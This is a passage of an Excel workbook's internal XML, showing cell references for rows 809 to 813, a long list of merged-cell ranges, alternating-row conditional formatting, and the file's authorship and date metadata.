      <c r="B809" s="7" t="s">
        <v>221</v>
      </c>
      <c r="C809" s="18"/>
      <c r="D809" s="19"/>
      <c r="E809" s="10" t="s">
        <v>1017</v>
      </c>
      <c r="F809" s="11" t="s">
        <v>1441</v>
      </c>
      <c r="H809" s="13" t="s">
        <v>2390</v>
      </c>
      <c r="I809" s="14" t="s">
        <v>2662</v>
      </c>
      <c r="J809" s="15" t="s">
        <v>2723</v>
      </c>
    </row>
    <row r="810" spans="1:10" ht="395" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A810" s="6"/>
      <c r="B810" s="7" t="s">
        <v>221</v>
      </c>
      <c r="C810" s="18"/>
      <c r="D810" s="19"/>
      <c r="E810" s="10" t="s">
        <v>1022</v>
      </c>
      <c r="F810" s="11" t="s">
        <v>1446</v>
      </c>
      <c r="G810" s="12" t="s">
        <v>1790</v>
      </c>
      <c r="H810" s="13" t="s">
        <v>2396</v>
      </c>
      <c r="I810" s="14" t="s">
        <v>2662</v>
      </c>
      <c r="J810" s="15" t="s">
        <v>2723</v>
      </c>
    </row>
    <row r="811" spans="1:10" ht="395" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A811" s="6"/>
      <c r="B811" s="7" t="s">
        <v>221</v>
      </c>
      <c r="C811" s="18"/>
      <c r="D811" s="19"/>
      <c r="E811" s="10" t="s">
        <v>610</v>
      </c>
      <c r="F811" s="11" t="s">
        <v>610</v>
      </c>
      <c r="G811" s="12" t="s">
        <v>610</v>
      </c>
      <c r="H811" s="13" t="s">
        <v>2405</v>
      </c>
      <c r="I811" s="14" t="s">
        <v>2662</v>
      </c>
      <c r="J811" s="15" t="s">
        <v>2723</v>
      </c>
    </row>
    <row r="812" spans="1:10" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A812" s="6"/>
      <c r="B812" s="7" t="s">
        <v>221</v>
      </c>
      <c r="C812" s="18"/>
      <c r="D812" s="19"/>
      <c r="E812" s="10" t="s">
        <v>1032</v>
      </c>
      <c r="F812" s="11" t="s">
        <v>1456</v>
      </c>
      <c r="G812" s="12" t="s">
        <v>1797</v>
      </c>
      <c r="H812" s="13" t="s">
        <v>2406</v>
      </c>
      <c r="I812" s="14" t="s">
        <v>2662</v>
      </c>
      <c r="J812" s="15" t="s">
        <v>2723</v>
      </c>
    </row>
    <row r="813" spans="1:10" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A813" s="6"/>
      <c r="B813" s="7" t="s">
        <v>221</v>
      </c>
      <c r="C813" s="20"/>
      <c r="D813" s="21"/>
      <c r="E813" s="10" t="s">
        <v>1033</v>
      </c>
      <c r="F813" s="11" t="s">
        <v>1457</v>
      </c>
      <c r="G813" s="12" t="s">
        <v>1798</v>
      </c>
      <c r="H813" s="13" t="s">
        <v>2407</v>
      </c>
      <c r="I813" s="14" t="s">
        <v>2662</v>
      </c>
      <c r="J813" s="15" t="s">
        <v>2723</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="246">
    <mergeCell ref="C807:C813"/>
    <mergeCell ref="D807:D813"/>
    <mergeCell ref="C791:C795"/>
    <mergeCell ref="D791:D795"/>
    <mergeCell ref="C796:C799"/>
    <mergeCell ref="D796:D799"/>
    <mergeCell ref="C800:C806"/>
    <mergeCell ref="D800:D806"/>
    <mergeCell ref="C770:C778"/>
    <mergeCell ref="D770:D778"/>
    <mergeCell ref="C779:C782"/>
    <mergeCell ref="D779:D782"/>
    <mergeCell ref="C783:C790"/>
    <mergeCell ref="D783:D790"/>
    <mergeCell ref="C751:C755"/>
    <mergeCell ref="D751:D755"/>
    <mergeCell ref="C756:C758"/>
    <mergeCell ref="D756:D767"/>
    <mergeCell ref="C759:C764"/>
    <mergeCell ref="C765:C767"/>
    <mergeCell ref="C735:C738"/>
    <mergeCell ref="D735:D738"/>
    <mergeCell ref="C739:C745"/>
    <mergeCell ref="D739:D750"/>
    <mergeCell ref="C746:C750"/>
    <mergeCell ref="C720:C724"/>
    <mergeCell ref="D720:D724"/>
    <mergeCell ref="C726:C729"/>
    <mergeCell ref="D726:D729"/>
    <mergeCell ref="C730:C734"/>
    <mergeCell ref="D730:D734"/>
    <mergeCell ref="C689:C700"/>
    <mergeCell ref="D689:D700"/>
    <mergeCell ref="C701:C713"/>
    <mergeCell ref="D701:D713"/>
    <mergeCell ref="C714:C719"/>
    <mergeCell ref="D714:D719"/>
    <mergeCell ref="C662:C666"/>
    <mergeCell ref="D662:D666"/>
    <mergeCell ref="C667:C669"/>
    <mergeCell ref="D667:D669"/>
    <mergeCell ref="C671:C687"/>
    <mergeCell ref="D671:D687"/>
    <mergeCell ref="C634:C640"/>
    <mergeCell ref="D634:D640"/>
    <mergeCell ref="C641:C655"/>
    <mergeCell ref="D641:D655"/>
    <mergeCell ref="C656:C661"/>
    <mergeCell ref="D656:D661"/>
    <mergeCell ref="C616:C620"/>
    <mergeCell ref="D616:D620"/>
    <mergeCell ref="C622:C627"/>
    <mergeCell ref="D622:D627"/>
    <mergeCell ref="C628:C633"/>
    <mergeCell ref="D628:D633"/>
    <mergeCell ref="C602:C606"/>
    <mergeCell ref="D602:D606"/>
    <mergeCell ref="C607:C612"/>
    <mergeCell ref="D607:D612"/>
    <mergeCell ref="C613:C615"/>
    <mergeCell ref="D613:D615"/>
    <mergeCell ref="C579:C587"/>
    <mergeCell ref="D579:D587"/>
    <mergeCell ref="C588:C594"/>
    <mergeCell ref="D588:D594"/>
    <mergeCell ref="C596:C601"/>
    <mergeCell ref="D596:D601"/>
    <mergeCell ref="C542:C546"/>
    <mergeCell ref="D542:D546"/>
    <mergeCell ref="C547:C563"/>
    <mergeCell ref="D547:D563"/>
    <mergeCell ref="C565:C577"/>
    <mergeCell ref="D565:D577"/>
    <mergeCell ref="C515:C529"/>
    <mergeCell ref="D515:D529"/>
    <mergeCell ref="C530:C535"/>
    <mergeCell ref="D530:D535"/>
    <mergeCell ref="C538:C541"/>
    <mergeCell ref="D538:D541"/>
    <mergeCell ref="C489:C497"/>
    <mergeCell ref="D489:D497"/>
    <mergeCell ref="C501:C505"/>
    <mergeCell ref="D501:D505"/>
    <mergeCell ref="C507:C513"/>
    <mergeCell ref="D507:D513"/>
    <mergeCell ref="C474:C477"/>
    <mergeCell ref="D474:D477"/>
    <mergeCell ref="C479:C482"/>
    <mergeCell ref="D479:D482"/>
    <mergeCell ref="C486:C488"/>
    <mergeCell ref="D486:D488"/>
    <mergeCell ref="C449:C453"/>
    <mergeCell ref="D449:D453"/>
    <mergeCell ref="C456:C458"/>
    <mergeCell ref="D456:D458"/>
    <mergeCell ref="C469:C472"/>
    <mergeCell ref="D469:D472"/>
    <mergeCell ref="C439:C442"/>
    <mergeCell ref="D439:D442"/>
    <mergeCell ref="C443:C445"/>
    <mergeCell ref="D443:D445"/>
    <mergeCell ref="C446:C448"/>
    <mergeCell ref="D446:D448"/>
    <mergeCell ref="C420:C423"/>
    <mergeCell ref="D420:D424"/>
    <mergeCell ref="C426:C427"/>
    <mergeCell ref="D426:D427"/>
    <mergeCell ref="C428:C432"/>
    <mergeCell ref="D428:D432"/>
    <mergeCell ref="C408:C410"/>
    <mergeCell ref="D408:D410"/>
    <mergeCell ref="C411:C414"/>
    <mergeCell ref="D411:D414"/>
    <mergeCell ref="C417:C418"/>
    <mergeCell ref="D417:D418"/>
    <mergeCell ref="C382:C391"/>
    <mergeCell ref="D382:D391"/>
    <mergeCell ref="C394:C397"/>
    <mergeCell ref="D394:D397"/>
    <mergeCell ref="C399:C404"/>
    <mergeCell ref="D399:D404"/>
    <mergeCell ref="C367:C368"/>
    <mergeCell ref="D367:D368"/>
    <mergeCell ref="C369:C371"/>
    <mergeCell ref="D369:D371"/>
    <mergeCell ref="C376:C379"/>
    <mergeCell ref="D376:D379"/>
    <mergeCell ref="C334:C338"/>
    <mergeCell ref="D334:D338"/>
    <mergeCell ref="C357:C360"/>
    <mergeCell ref="D357:D360"/>
    <mergeCell ref="C364:C365"/>
    <mergeCell ref="D364:D365"/>
    <mergeCell ref="C321:C325"/>
    <mergeCell ref="D321:D325"/>
    <mergeCell ref="C326:C329"/>
    <mergeCell ref="D326:D329"/>
    <mergeCell ref="C330:C332"/>
    <mergeCell ref="D330:D332"/>
    <mergeCell ref="C310:C312"/>
    <mergeCell ref="D310:D312"/>
    <mergeCell ref="C313:C314"/>
    <mergeCell ref="D313:D314"/>
    <mergeCell ref="C316:C320"/>
    <mergeCell ref="D316:D320"/>
    <mergeCell ref="C286:C292"/>
    <mergeCell ref="D286:D292"/>
    <mergeCell ref="C293:C306"/>
    <mergeCell ref="D293:D306"/>
    <mergeCell ref="C307:C308"/>
    <mergeCell ref="D307:D308"/>
    <mergeCell ref="C250:C262"/>
    <mergeCell ref="D250:D262"/>
    <mergeCell ref="C264:C269"/>
    <mergeCell ref="D264:D269"/>
    <mergeCell ref="C270:C282"/>
    <mergeCell ref="D270:D282"/>
    <mergeCell ref="C238:C243"/>
    <mergeCell ref="D238:D243"/>
    <mergeCell ref="C245:C247"/>
    <mergeCell ref="D245:D247"/>
    <mergeCell ref="C248:C249"/>
    <mergeCell ref="D248:D249"/>
    <mergeCell ref="C208:C217"/>
    <mergeCell ref="D208:D217"/>
    <mergeCell ref="C219:C228"/>
    <mergeCell ref="D219:D228"/>
    <mergeCell ref="C229:C237"/>
    <mergeCell ref="D229:D237"/>
    <mergeCell ref="C170:C181"/>
    <mergeCell ref="D170:D181"/>
    <mergeCell ref="C182:C194"/>
    <mergeCell ref="D182:D194"/>
    <mergeCell ref="C195:C206"/>
    <mergeCell ref="D195:D206"/>
    <mergeCell ref="C161:C163"/>
    <mergeCell ref="D161:D163"/>
    <mergeCell ref="C164:C165"/>
    <mergeCell ref="D164:D165"/>
    <mergeCell ref="C167:C169"/>
    <mergeCell ref="D167:D169"/>
    <mergeCell ref="C134:C142"/>
    <mergeCell ref="D134:D142"/>
    <mergeCell ref="C143:C148"/>
    <mergeCell ref="D143:D148"/>
    <mergeCell ref="C149:C154"/>
    <mergeCell ref="D149:D154"/>
    <mergeCell ref="C105:C113"/>
    <mergeCell ref="D105:D113"/>
    <mergeCell ref="C117:C125"/>
    <mergeCell ref="D117:D125"/>
    <mergeCell ref="C128:C132"/>
    <mergeCell ref="D128:D132"/>
    <mergeCell ref="C88:C94"/>
    <mergeCell ref="D88:D94"/>
    <mergeCell ref="C97:C99"/>
    <mergeCell ref="D97:D99"/>
    <mergeCell ref="C100:C104"/>
    <mergeCell ref="D100:D104"/>
    <mergeCell ref="C75:C78"/>
    <mergeCell ref="D75:D78"/>
    <mergeCell ref="C79:C82"/>
    <mergeCell ref="D79:D82"/>
    <mergeCell ref="C83:C87"/>
    <mergeCell ref="D83:D87"/>
    <mergeCell ref="C57:C59"/>
    <mergeCell ref="D57:D59"/>
    <mergeCell ref="C66:C70"/>
    <mergeCell ref="D66:D70"/>
    <mergeCell ref="C72:C74"/>
    <mergeCell ref="D72:D74"/>
    <mergeCell ref="D39:D43"/>
    <mergeCell ref="C46:C48"/>
    <mergeCell ref="D46:D52"/>
    <mergeCell ref="C49:C52"/>
    <mergeCell ref="C53:C56"/>
    <mergeCell ref="D53:D56"/>
    <mergeCell ref="A380:A415"/>
    <mergeCell ref="C3:C6"/>
    <mergeCell ref="D3:D6"/>
    <mergeCell ref="C7:C9"/>
    <mergeCell ref="D7:D9"/>
    <mergeCell ref="C15:C17"/>
    <mergeCell ref="D15:D17"/>
    <mergeCell ref="C18:C21"/>
    <mergeCell ref="D18:D21"/>
    <mergeCell ref="C25:C27"/>
    <mergeCell ref="D25:D27"/>
    <mergeCell ref="C28:C31"/>
    <mergeCell ref="D28:D31"/>
    <mergeCell ref="C32:C36"/>
    <mergeCell ref="D32:D36"/>
    <mergeCell ref="C39:C43"/>
    <mergeCell ref="A2:A38"/>
    <mergeCell ref="A39:A78"/>
    <mergeCell ref="A79:A142"/>
    <mergeCell ref="A143:A333"/>
    <mergeCell ref="A334:A379"/>
    <mergeCell ref="A725:A768"/>
    <mergeCell ref="A769:A813"/>
    <mergeCell ref="A416:A434"/>
    <mergeCell ref="A435:A461"/>
    <mergeCell ref="A462:A482"/>
    <mergeCell ref="A483:A505"/>
    <mergeCell ref="A506:A620"/>
    <mergeCell ref="A621:A724"/>
  </mergeCells>
  <conditionalFormatting sqref="C1:D1048576">
    <cfRule type="colorScale" priority="2">
      <colorScale>
        <cfvo type="formula" val="MOD(ROW(),2)=0"/>
        <cfvo type="formula" val="MOD(ROW(),2)=1"/>
        <color theme="9" tint="0.79998168889431442"/>
        <color theme="9" tint="0.39997558519241921"/>
      </colorScale>
    </cfRule>
    <cfRule type="colorScale" priority="3">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="max"/>
        <color theme="0" tint="-4.9989318521683403E-2"/>
        <color theme="0" tint="-0.249977111117893"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C2:D1048576">
    <cfRule type="colorScale" priority="1">
      <colorScale>
        <cfvo type="formula" val="MOD(ROW(),2)=0"/>
        <cfvo type="formula" val="MOD(ROW(),2)=1"/>
        <color theme="9" tint="0.79998168889431442"/>
        <color theme="9" tint="0.39997558519241921"/>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Smeet Sabalpara</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-07T18:58:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-07T21:05:08Z</dcterms:modified>
</cp:coreProperties>
</file>